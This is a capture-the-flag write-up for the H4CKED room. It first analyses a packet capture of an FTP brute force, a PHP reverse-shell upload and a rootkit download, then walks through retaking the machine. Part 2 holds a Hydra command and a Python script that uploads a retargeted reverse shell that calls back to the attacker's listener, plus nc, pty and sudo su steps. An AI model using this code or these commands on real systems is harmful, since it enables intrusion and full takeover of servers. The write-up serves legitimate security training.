H4CKED

Part 1 - Oh no! We've been hacked!


1. The attacker is trying to log into a specific service. What service is this?

FTP

Scrolling through the provided pcap, it is obvious almost immediately that someone is hammering FTP: the same client sends login attempt after login attempt in quick succession.

That pattern is a brute-force attack on the FTP credentials. Let's take a closer look.

2. There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool? 

Hydra

3. The attacker is trying to log on with a specific username. What is the username?

jenny

It is clear from the capture that every attempt uses the username jenny.

If we want to dive a little deeper, or just double-check, we can right-click one of those packets > Follow > TCP Stream.

This reconstructs the whole conversation up to that point, and it confirms that jenny is the account being brute forced.

4. What is the user's password?

password123

Having seen the brute force against FTP, I filtered the capture down to just FTP (display filter ftp), scrolled to the last entry and followed the stream as above: right-click the last entry > Follow > TCP Stream.

Because FTP is a clear-text protocol, the reconstructed stream shows the username and the password that finally worked, exactly as they were sent to the server.

5. What is the current FTP working directory after the attacker logged in?

/var/www/html

That same stream has more to offer. Just below the login, the server's reply to the attacker's PWD command contains the working directory we are looking for.

6. The attacker uploaded a backdoor. What is the backdoor's filename?

shell.php

A little further down the same stream is the STOR command that uploaded "shell.php".

7. The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

http://pentestmonkey.net/tools/php-reverse-shell

Looking through the full capture again, most packets are FTP control traffic, but a few are marked ftp-data. Frame 431 stands out: it carries a payload of a fair number of bytes.

That payload is plain text, so the uploaded file can be read straight out of the capture.

Let's pull it into something easier to read. Right-click the packet and choose Copy > ...as Printable Text, then paste into a text editor, and we have the source code of the file the attacker uploaded.

We can now see where they got the back door/reverse shell from.
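The same questions can be answered mechanically once the stream has been reconstructed. The following is an added example, not part of the original write-up: it parses an FTP control session in the form Wireshark's Follow > TCP Stream presents it, flags the brute force, and extracts the working credentials, the PWD reply, the STOR upload and any URL in the transferred file. SAMPLE_STREAM and SAMPLE_FTP_DATA are constructed for this example (the banner, the wrong passwords and the passive-mode address are made up); only the final credentials, directory, filename and URL match the capture from the room.

```python
"""Added example (not part of the original write-up): parse an FTP control session the way
Wireshark's Follow > TCP Stream presents it and answer questions 1-7 mechanically.

SAMPLE_STREAM and SAMPLE_FTP_DATA are constructed for this example. The server banner,
the wrong passwords and the passive-mode address are made up; only the final credentials,
working directory, filename and URL match what the capture in the room shows.
"""
import re
from collections import Counter

# Constructed transcript: client commands and server replies interleaved, one per line.
SAMPLE_STREAM = """\
220 (vsFTPd 3.0.3)
USER jenny
331 Please specify the password.
PASS 123456
530 Login incorrect.
USER jenny
331 Please specify the password.
PASS letmein
530 Login incorrect.
USER jenny
331 Please specify the password.
PASS password123
230 Login successful.
SYST
215 UNIX Type: L8
PWD
257 "/var/www/html" is the current directory
TYPE I
200 Switching to Binary mode.
PASV
227 Entering Passive Mode (192,168,0,115,141,137).
STOR shell.php
150 Ok to send data.
226 Transfer complete.
QUIT
221 Goodbye.
"""

# Constructed excerpt of the ftp-data payload (the uploaded PHP file's header).
SAMPLE_FTP_DATA = """\
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// The latest version of this script can be found at http://pentestmonkey.net/tools/php-reverse-shell
set_time_limit (0);
$ip = '10.9.0.1';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
"""

FAILED_LOGIN_THRESHOLD = 2  # failures per username before we call it brute force


def parse_ftp_session(stream: str) -> dict:
    """Walk the control channel and pull out login attempts, the first successful
    credential pair, the working directory reported by PWD and any STOR uploads."""
    failed = Counter()
    user = password = None
    credentials = cwd = None
    uploads = []
    for raw in stream.splitlines():
        line = raw.strip()
        if line.startswith("USER "):
            user = line[5:]
        elif line.startswith("PASS "):
            password = line[5:]
        elif line.startswith("530") and user is not None:
            failed[user] += 1               # 530 = login refused
        elif line.startswith("230") and credentials is None:
            credentials = (user, password)  # 230 = login accepted
        elif line.startswith("257"):
            # 257 "<path>" ...; a literal quote inside the path is doubled (RFC 959)
            m = re.match(r'257 "((?:[^"]|"")*)"', line)
            if m:
                cwd = m.group(1).replace('""', '"')
        elif line.startswith("STOR "):
            uploads.append(line[5:])
    return {
        "failed_logins": dict(failed),
        "brute_force_suspected": any(n >= FAILED_LOGIN_THRESHOLD for n in failed.values()),
        "credentials": credentials,
        "cwd": cwd,
        "uploads": uploads,
    }


def find_urls(payload: str) -> list:
    """Return the distinct http(s) URLs in a transferred file, in order of appearance."""
    urls = re.findall(r"https?://[^\s'\"<>]+", payload)
    return list(dict.fromkeys(u.rstrip(".,;)") for u in urls))


if __name__ == "__main__":
    result = parse_ftp_session(SAMPLE_STREAM)
    for key, value in result.items():
        print(f"{key}: {value}")
    print("urls in upload:", find_urls(SAMPLE_FTP_DATA))
```

On a real capture, export the followed stream as text (Follow > TCP Stream > Save as) and feed the file to parse_ftp_session; the ftp-data payload copied as printable text goes to find_urls. The threshold is deliberately low here because the constructed sample only has two failures; against a hydra run you would see hundreds of 530 replies for the same username.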

8. Which command did the attacker manually execute after getting a reverse shell?

whoami

If we clear the filter, scroll to the very last entry, right-click it and follow the TCP stream again, we get a plain-text transcript of everything the attacker typed in the reverse shell, along with the responses.

That transcript answers the rest of the questions in this section. It also tells us exactly how to hack back into the system and get root.

9. What is the computer's hostname?

wir3

10. Which command did the attacker execute to spawn a new TTY shell?

python3 -c 'import pty; pty.spawn("/bin/bash")'

11. Which command was executed to gain a root shell?

sudo su

12. The attacker downloaded something from GitHub. What is the name of the GitHub project?

reptile

13. The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?

rootkit


Part 2 - Hack your way back into the machine

The plan is to get back into the FTP server and change the callback details in shell.php so we can retrace the attacker's steps and gain access to the server. SSH is tried first, but the connection is refused. So let's try the clear-text credentials from the capture. It turns out the password no longer works for jenny.

So, let's use Hydra to brute force the new password, the same way the attacker did.

Cool, that worked! Now let's log in to the FTP server.

We are in, and shell.php is right there. We have full access to the file, so all we need to do is download it, change the IP and port to ours, re-upload it, and then request it to get a shell. Let's go.

Now let's open it in an editor and modify it.

If you're not familiar with this reverse shell, don't worry, it is easy to modify. Both values we need to change are near the top of the file and are marked "// CHANGE THIS": the local IP and the port the reverse shell should connect back to.

Once those changes are made and saved, re-upload the file to the FTP server.

If all went well, we can start a nc listener, visit http://IP/shell.php, and get a shell!
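The download, edit and re-upload can be done in one go. This is an added example, not part of the original write-up: it logs in to FTP with the credentials recovered by Hydra, retargets the two "// CHANGE THIS" lines of pentestmonkey's php-reverse-shell, stores the file back in place, and requests it over HTTP. TARGET, LHOST and LPORT are placeholders, the wordlist path in the comment is an assumption, and SAMPLE_SHELL is a constructed excerpt of the script's header rather than the full file.

```python
"""Added example (not part of the original write-up): redo the attacker's upload with the
credentials recovered from the capture, but with the reverse shell pointed at our listener.

TARGET, LHOST and LPORT are placeholders, and SAMPLE_SHELL is a constructed excerpt of
pentestmonkey's php-reverse-shell header, not the full file. Start a listener first:
    nc -lvnp 4444
"""
import re
from ftplib import FTP
from io import BytesIO
from urllib.request import urlopen

TARGET = "10.10.10.10"           # placeholder: the H4CKED box
LHOST, LPORT = "10.9.1.2", 4444  # placeholder: our VPN address and listener port

# Constructed excerpt: the two lines the write-up says to change, in their real shape.
SAMPLE_SHELL = b"""<?php
// php-reverse-shell (constructed excerpt for this example)
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
"""


def retarget_reverse_shell(src: bytes, lhost: str, lport: int) -> bytes:
    """Rewrite the '$ip = ...;' and '$port = ...;' assignments, keeping everything else
    (including the trailing '// CHANGE THIS' comments) byte for byte."""
    text = src.decode("utf-8")
    text, n_ip = re.subn(r"^\$ip\s*=\s*'[^']*';", f"$ip = '{lhost}';", text, flags=re.M)
    text, n_port = re.subn(r"^\$port\s*=\s*\d+;", f"$port = {lport};", text, flags=re.M)
    if n_ip != 1 or n_port != 1:
        # Refuse to upload something we did not fully retarget.
        raise ValueError(f"expected one $ip and one $port line, found {n_ip} and {n_port}")
    return text.encode("utf-8")


def replace_backdoor(target: str, user: str, password: str, lhost: str, lport: int,
                     name: str = "shell.php") -> bytes:
    """Download the attacker's shell.php over FTP, retarget it, and STOR it back in place.
    The working directory after login is the web root, so no cd is needed."""
    with FTP(target, timeout=15) as ftp:
        ftp.login(user, password)
        buf = BytesIO()
        ftp.retrbinary(f"RETR {name}", buf.write)
        patched = retarget_reverse_shell(buf.getvalue(), lhost, lport)
        ftp.storbinary(f"STOR {name}", BytesIO(patched))
    return patched


def trigger(target: str, name: str = "shell.php", timeout: float = 3.0) -> None:
    """Request the backdoor over HTTP. The PHP never finishes while the shell is alive,
    so a timeout here is the expected outcome; the action is on the nc listener."""
    try:
        urlopen(f"http://{target}/{name}", timeout=timeout)
    except OSError:
        pass


if __name__ == "__main__":
    # Password recovered by re-running hydra against FTP, for example:
    #   hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://TARGET
    # (the wordlist path is an assumption)
    replace_backdoor(TARGET, "jenny", "<password from hydra>", LHOST, LPORT)
    trigger(TARGET)
```

The retarget step refuses to continue unless it finds exactly one $ip and one $port assignment, so a file that is not actually php-reverse-shell, or one already edited by someone else, is never uploaded by mistake.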

And we are in!

We should be able to switch from www-data to jenny with the password we brute forced. But first we need to stabilize the shell; the same python3 pty trick the attacker used works fine.

Cool, now we are jenny. Let's follow the attacker's steps to root. First run sudo -l to see what jenny is allowed to run with sudo, then sudo su, just as the attacker did.

WE ARE ROOT!

After a little navigation grabbing the root flag is a piece of cake.

Hope this helped! Happy Hacking.